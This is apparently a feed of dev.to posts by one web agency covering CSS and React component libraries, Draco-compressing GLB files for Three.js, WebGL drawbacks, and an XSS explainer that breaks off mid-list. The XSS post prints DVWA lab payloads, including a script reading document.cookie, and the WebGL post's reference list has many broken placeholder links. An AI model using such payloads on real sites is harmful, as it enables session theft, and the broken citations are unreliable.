  Disadvantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Code Bloat:&lt;/strong&gt; Customizations often lead to bloated code. ❌&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;All these libraries are visually appealing and robust, each with its own use cases. For large projects requiring frequent updates, Bootstrap and TailwindCSS are excellent choices. Ant Design and Material UI are more suited for enterprise applications, while Bulma offers a unique, aesthetic alternative. Ultimately, the best library depends on your specific needs. Personally, I've used all the libraries mentioned for various production websites, and each has its strengths.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://getbootstrap.com/" rel="noopener noreferrer"&gt;Bootstrap 5&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://tailwindcss.com/" rel="noopener noreferrer"&gt;TailwindCSS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://bulma.io/" rel="noopener noreferrer"&gt;Bulma&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ant.design/" rel="noopener noreferrer"&gt;Ant Design&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://mui.com/" rel="noopener noreferrer"&gt;Material UI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>webdev</category>
      <category>javascript</category>
      <category>react</category>
      <category>frontend</category>
    </item>
    <item>
      <title>How to Compress .glb File to Draco Compressed Format</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Mon, 20 May 2024 06:28:04 +0000</pubDate>
      <link>https://dev.to/agws/how-to-compress-glb-file-to-draco-compressed-format-24bk</link>
      <guid>https://dev.to/agws/how-to-compress-glb-file-to-draco-compressed-format-24bk</guid>
      <description>&lt;h2&gt;
  
  
  Steps
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Compress GLB File to Draco Compressed Format Using &lt;a href="https://optimizeglb.com/" rel="noopener noreferrer"&gt;optimizeglb.com&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;View Compressed Draco Files at &lt;a href="https://www.3dpea.com/en/view-DRACO-online" rel="noopener noreferrer"&gt;3dpea.com&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Add Relevant Code to ThreeJS&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;GLTFLoader&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https://cdn.skypack.dev/three@0.136.0/examples/jsm/loaders/GLTFLoader.js&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;DRACOLoader&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https://cdn.skypack.dev/three@0.136.0/examples/jsm/loaders/DRACOLoader.js&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;draco&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;DRACOLoader&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="nx"&gt;draco&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;setDecoderPath&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https://www.gstatic.com/draco/v1/decoders/&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;loader&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;GLTFLoader&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="c1"&gt;// ADD DracoLoader to your Existing Loader &lt;/span&gt;
&lt;span class="nx"&gt;loader&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;setDRACOLoader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;draco&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Replace Your Current 3D GLB File with Compressed Draco Format&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Enjoy 90% Less in terms of The 3D File Size.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://google.github.io/draco/" rel="noopener noreferrer"&gt;Draco Compression&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://optimizeglb.com/" rel="noopener noreferrer"&gt;Optimize GLB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.3dpea.com/en/view-DRACO-online" rel="noopener noreferrer"&gt;View Draco Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://threejs.org/docs/#examples/en/loaders/DRACOLoader" rel="noopener noreferrer"&gt;Three.js DRACOLoader Documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>The Reality of Using WebGL &amp; Frameworks Like Three.js and Babylon.js</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Sun, 12 May 2024 05:11:18 +0000</pubDate>
      <link>https://dev.to/agws/the-reality-of-using-webgl-frameworks-like-threejs-and-babylonjs-32bb</link>
      <guid>https://dev.to/agws/the-reality-of-using-webgl-frameworks-like-threejs-and-babylonjs-32bb</guid>
      <description>&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;3D Websites Require a Higher Learning Curve&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;• Learning WebGL, Three.js, or Babylon.js involves understanding the canvas, coordinate systems, and other fundamentals.&lt;br&gt;
• Optimizing textures and 3D files (e.g., .stl, .fbx, .gltf, .glb) is necessary for performance&lt;a href="https://forum.babylonjs.com/t/slow-loading-of-glb-files-with-textures-compared-to-threejs/40730" rel="noopener noreferrer"&gt;11&lt;/a&gt;,&lt;a href="https://discourse.threejs.org/t/gltf-model-memory-usage/42048" rel="noopener noreferrer"&gt;21&lt;/a&gt;,&lt;a href="https://stackoverflow.com/questions/38971735/three-js-managing-memory-when-using-a-lot-of-textures" rel="noopener noreferrer"&gt;23&lt;/a&gt;,&lt;a href="https://stackoverflow.com/questions/38971735/three-js-managing-memory-when-using-a-lot-of-textures" rel="noopener noreferrer"&gt;25&lt;/a&gt;.&lt;br&gt;
• Developers need to optimize textures, poly counts, and simplify geometry.&lt;br&gt;
• Web developers may lack 3D skills initially, making optimization challenging.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;3D Websites Require a Lot of Computer Resources &amp;amp; Are Harder to Optimize&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;• 3D websites focus on RAM usage, requiring substantial resources.&lt;a href="https://discourse.threejs.org/t/insane-ram-usage-when-scrolling-around-the-page/24454" rel="noopener noreferrer"&gt;20&lt;/a&gt;,&lt;a href="https://discourse.threejs.org/t/gltf-model-memory-usage/42048" rel="noopener noreferrer"&gt;21&lt;/a&gt;&lt;br&gt;
• High-end hardware is needed for optimal performance, which may not be accessible to average users,Check Blender Best Computer Specifications for Example at &lt;a href="https://opendata.blender.org/" rel="noopener noreferrer"&gt;15&lt;/a&gt;.&lt;br&gt;
• High memory usage can lead to slow loading times and poor user experiences.&lt;a href="https://forum.unity.com/threads/webgl-excessive-memory-consumption-1-5gb.622720/" rel="noopener noreferrer"&gt;19&lt;/a&gt;,&lt;a href="https://discourse.threejs.org/t/insane-ram-usage-when-scrolling-around-the-page/24454" rel="noopener noreferrer"&gt;20&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Justifying Development Costs Using 3D in Websites is Used in Niche Use Cases&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;• Examples like Ikea demonstrate effective use of 3D for product visualization.&lt;br&gt;
• Personal portfolios can also benefit from 3D elements but are niche use cases.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Comparsion Between ThreeJS and BablyonJS WebGL FrameWorks&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;• Three.js and Babylon.js are popular WebGL frameworks, each with its advantages and disadvantages.&lt;br&gt;
• Babylon.js offers Native TypeScript support, while Three.js has a larger community and a community package for typescript support.&lt;br&gt;
• Babylon.js provides better debugging tools.&lt;br&gt;
Check &lt;a href="https://medium.com/@shariq.ahmed525/difference-between-three-js-and-babylon-js-what-actually-should-you-choose-996fd6a7ac40" rel="noopener noreferrer"&gt;26&lt;/a&gt; &lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Conclusion &amp;amp; Best Use Case Examples for 3D Modeling&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;• 3D modelling is suitable for interior design, museums, personal, and company portfolios.&lt;br&gt;
• Optimizing assets and utilizing loading options can improve performance.&lt;br&gt;
• Examples like Ikea's room builder showcase effective 3D implementation.&lt;br&gt;
Conclusion&lt;br&gt;
• 3D websites have potential but require significant development effort and resources.&lt;br&gt;
• High hardware requirements and optimization challenges limit widespread adoption.&lt;br&gt;
• Advances in hardware, like ARM processors, may improve 3D web experiences in the future.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;References&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Understood! Here are all your references organized with link names:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Web Graphics and Performance&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;WebGL Memory Consumption:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[19]"&gt;WebGL Excessive Memory Consumption&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Slow Loading 3D Models:

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://dev.tolinkname%20[10]"&gt;Models Load Slow on Netlify&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Slow 3D Websites:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[7]"&gt;Why Do We Not See More 3D Websites&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Three.js Performance Optimization:

&lt;ul&gt;
&lt;li&gt;Load Time:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[9]"&gt;How to Improve the Load Time of My App&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Memory Usage:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[20]"&gt;Insane RAM Usage When Scrolling Around the Page&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[21]"&gt;GLTF Model Memory Usage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[22]"&gt;How Much GB of Memory My Renderer Scene is Holding&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[23]"&gt;Managing Memory When Using a Lot of Textures&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;/li&gt;

&lt;li&gt;Babylon.js vs Three.js Performance:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[27]"&gt;BabylonJS vs ThreeJS performance comparison&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;WebGL Frameworks Performance:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.tolinkname%20[28]"&gt;Main Reasons for Performance Differences Between WebGL Frameworks&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3D Resources&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Blender for Dummies: [&lt;a href="https://www.oreilly.com/library/view/blender-for-dummies/9780470584460/ch003-sec002.html" rel="noopener noreferrer"&gt;12&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;Steam Hardware Survey: &lt;a href="https://dev.tolinkname%20[13]"&gt;Steam Hardware &amp;amp; Software Survey&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Open Data Blender: [&lt;a href="https://opendata.blender.org/" rel="noopener noreferrer"&gt;15&lt;/a&gt;]&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Browser Compatibility&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;WebGL Memory Issues in Brave Browser: &lt;a href="https://dev.tolinkname%20[1]"&gt;Brave Browser WebGL Memory Issue&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;WebGL Memory Tracking and Optimization&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;WebGL Memory Tracker Library: &lt;a href="https://dev.tolinkname%20[4]"&gt;Library to Track WebGL Memory&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Unity WebGL Memory Management: &lt;a href="https://dev.tolinkname%20[5]"&gt;Memory in Unity WebGL&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Other (Potentially Relevant)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Smartphone RAM: &lt;a href="https://dev.tolinkname%20[34]"&gt;How Much RAM is in Smartphones&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Other (Not Relevant)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AMD EPYC Processor: [&lt;a href="https://www.amazon.com/AMD-EPYC-7742-Tetrahexaconta-core-Processor/dp/B07XGB7S36" rel="noopener noreferrer"&gt;16&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;Ikea Bestå Shelf Unit: [&lt;a href="https://www.ikea.com/nl/en/p/besta-shelf-unit-with-doors-black-brown-lappviken-black-brown-s09047376/" rel="noopener noreferrer"&gt;17&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;DRAM Revenue Statistics: &lt;a href="https://dev.tolinkname%20[24]"&gt;Global DRAM Revenues of Semiconductor Companies Since 2010&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Three.js vs Babylon.js: &lt;a href="https://dev.tolinkname%20[26]"&gt;Difference Between Three.js and Babylon.js&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Why Use Babylon.js: &lt;a href="https://dev.tolinkname%20[31]"&gt;Why We Use BabylonJS Instead of ThreeJS in 2022&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Three.js and TypeScript: &lt;a href="https://dev.tolinkname%20[33]"&gt;Is Three.js Completely Compatible with Typescript at This Stage&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>webdev</category>
      <category>webgl</category>
      <category>javascript</category>
      <category>threejs</category>
    </item>
    <item>
      <title>Best FrontEnd &amp; New ReUsable Component Libraries For React JS 2024.</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Tue, 07 May 2024 23:30:00 +0000</pubDate>
      <link>https://dev.to/agws/best-frontend-new-reusable-component-libraries-for-react-js-2024-2ch6</link>
      <guid>https://dev.to/agws/best-frontend-new-reusable-component-libraries-for-react-js-2024-2ch6</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb2x84aoe3qz3ovsemjzv.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb2x84aoe3qz3ovsemjzv.jpg" alt="Preview." width="800" height="450"&gt;&lt;/a&gt;# Best FrontEnd &amp;amp; New ReUsable Component Libraries For React JS 2024&lt;br&gt;
&lt;a href="https://youtu.be/W9rjtzbL_7o" rel="noopener noreferrer"&gt;Youtube Video&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. ShadCN
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://ui.shadcn.com/" rel="noopener noreferrer"&gt;ShadCN&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Description:&lt;/strong&gt; This is not a library of components. You can copy and paste this collection of reusable components into your apps.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Ownership and Control over Components✔️ &lt;/li&gt;
&lt;li&gt;Style is not coupled with the implementation✔️ &lt;/li&gt;
&lt;li&gt;Works on Any Framework That Supports React Like Next.js, Astro, Remix, Gatsby etc.✔️&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Improvements:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Harder to Setup for beginners ❌&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. Plate.js
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://platejs.org/" rel="noopener noreferrer"&gt;Plate.js&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/udecode/plate" rel="noopener noreferrer"&gt;plate - github&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Description:&lt;/strong&gt; Plugin system &amp;amp; primitive component library. CLI for styled components. Customizable. Open Source&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Easier to Setup ✔️ &lt;/li&gt;
&lt;li&gt;Code and Custom Plugins Can be Set.✔️ &lt;/li&gt;
&lt;li&gt;Based On RadixUI, and ShadCN/UI.✔️&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Improvements:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Newer Library With a unique way to setup that can be simplified.❌&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  3. Radix UI
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.radix-ui.com/" rel="noopener noreferrer"&gt;Radix UI&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Description:&lt;/strong&gt; A pre-styled component library called Radix Themes is intended to function right out of the box with little setup required. Visit Radix Primitives if you're seeking for the unstyled components.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Works on Any Framework That Supports React Like Next.js, Astro, Remix, Gatsby etc.✔️&lt;/li&gt;
&lt;li&gt;Can Install an icon package as well &lt;code&gt;npm i @radix-ui/react-icons&lt;/code&gt;✔️&lt;/li&gt;
&lt;li&gt;Can have a custom Color Palette like TailwindCSS &lt;a href="https://www.radix-ui.com/colors/custom" rel="noopener noreferrer"&gt;Custom Colors&lt;/a&gt;.✔️&lt;/li&gt;
&lt;li&gt;Can Install individual Components using Primitives.✔️&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Improvements:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Harder to Setup ❌&lt;/li&gt;
&lt;li&gt;No Ownership and Full Control over Components❌&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  4. Acternity UI
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://ui.aceternity.com/" rel="noopener noreferrer"&gt;Acternity UI&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Description:&lt;/strong&gt; A UI library with visually appealing components built on Next.js, React, TailwindCSS, and Framer Motion.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Works on Any Framework That Supports React Like Next.js, Astro, Remix, Gatsby etc.✔️&lt;/li&gt;
&lt;li&gt;Best UI Looking Components✔️&lt;/li&gt;
&lt;li&gt;Can Install Multiple Free Reusable Components.✔️ &lt;a href="https://ui.aceternity.com/components" rel="noopener noreferrer"&gt;Components&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Ownership and Full Control over Components&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Improvements:&lt;/strong&gt; &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Needs some dependencies to work properly (&lt;code&gt;framer-motion clsx tailwind-merge @tabler/icons-react&lt;/code&gt;), however, these packages are what makes it simple to use something like Acternity UI.❌&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  5. NextUI
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://nextui.org/" rel="noopener noreferrer"&gt;NextUI&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Description:&lt;/strong&gt; With the aid of the React UI library NextUI, you can create stunning and easily navigable user interfaces. Built around React Aria and Tailwind CSS.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Independent community project From Vercel. ✔️&lt;/li&gt;
&lt;li&gt;Built on React TailwindCSS ✔️&lt;/li&gt;
&lt;li&gt;Can Install individual Components✔️&lt;/li&gt;
&lt;li&gt;Provides a set of accessible and customizable components, hooks, and utilities.✔️&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;

&lt;/ul&gt;

</description>
      <category>webdev</category>
      <category>javascript</category>
      <category>react</category>
      <category>frontend</category>
    </item>
    <item>
      <title>Understanding Cross-Site Scripting (XSS) Vulnerabilities</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Thu, 15 Feb 2024 07:41:10 +0000</pubDate>
      <link>https://dev.to/agws/understanding-cross-site-scripting-xss-vulnerabilities-5g0c</link>
      <guid>https://dev.to/agws/understanding-cross-site-scripting-xss-vulnerabilities-5g0c</guid>
      <description>&lt;p&gt;Understanding Cross-Site Scripting (XSS) Vulnerabilities&lt;/p&gt;

&lt;p&gt;🔍 &lt;strong&gt;Introduction to Cross-Site Scripting (XSS) Vulnerabilities&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Cross-site Scripting (XSS) is a persistent security threat on the web, recognized by the Open Web Application Security Project (OWASP) as one of the top-10 risks. Despite being an old technique, XSS vulnerabilities continue to plague websites, posing serious risks to user data and system integrity.&lt;/p&gt;

&lt;p&gt;🔍 &lt;strong&gt;Instances of XSS Attacks on Companies&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;🔍 &lt;strong&gt;Real-Life Cases of Cross-Site Scripting Incidents&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;British Airways Incident:&lt;/strong&gt; In 2018, British Airways fell victim to an XSS attack orchestrated by Magecart, leading to the compromise of 380,000 transactions. The attackers exploited an XSS vulnerability in the Feedify JavaScript library, redirecting customer data to a fraudulent server and executing credit card skimming. &lt;a href="https://excess-xss.com/" rel="noopener noreferrer"&gt;Reference&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fortnite Vulnerability:&lt;/strong&gt; In 2019, the popular game Fortnite encountered an XSS vulnerability affecting millions of users. Attackers could potentially access user data and redirect them to counterfeit login pages, facilitating theft of virtual currency and unauthorized access to conversations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;eBay's XSS Challenge:&lt;/strong&gt; During late 2015 and early 2016, eBay faced a severe XSS vulnerability, allowing attackers to inject malicious code into pages. This enabled unauthorized access to seller accounts, manipulation of high-value listings, and exploitation of payment details.&lt;/p&gt;

&lt;p&gt;🔍 &lt;strong&gt;Varieties of XSS Attacks&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Reflected XSS&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Definition:&lt;/strong&gt; Originates from the current HTTP request.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Impact:&lt;/strong&gt; Enables attackers to compromise user accounts and perform malicious actions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detection:&lt;/strong&gt; Can be detected through careful analysis of input and output data.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example:&lt;/strong&gt; Injecting a script through a search function's URL parameter.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mitigation:&lt;/strong&gt; Implement input validation and output encoding to prevent script execution. &lt;a href="https://portswigger.net/web-security/cross-site-scripting/reflected" rel="noopener noreferrer"&gt;Reference&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Example in DVWA:&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;localhost/dvwa/vulnerabilities/xss_r/?name=&amp;lt;script&amp;gt;alert('XSS: Attack test')&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Stored XSS&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Definition:&lt;/strong&gt; Malicious script is sourced from the website's database.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Impact:&lt;/strong&gt; Allows attackers to persistently infect users accessing the compromised data.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detection:&lt;/strong&gt; Requires scanning database entries for suspicious script content.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example:&lt;/strong&gt; Injecting code into user-generated content like comments or profiles.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mitigation:&lt;/strong&gt; Implement strict input validation, output encoding, and content filtering. &lt;a href="https://portswigger.net/web-security/cross-site-scripting/stored" rel="noopener noreferrer"&gt;Reference&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Example from &lt;a href="https://pentest-tools.com/blog/xss-attacks-practical-scenarios#xss-attack-1-hijacking-the-users-session" rel="noopener noreferrer"&gt;Pentest-Tools&lt;/a&gt;:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hijacking User Session:&lt;/strong&gt; &lt;br&gt;
   &lt;code&gt;localhost/dvwa/vulnerabilities/xss_r/?name=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;DOM-based XSS&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
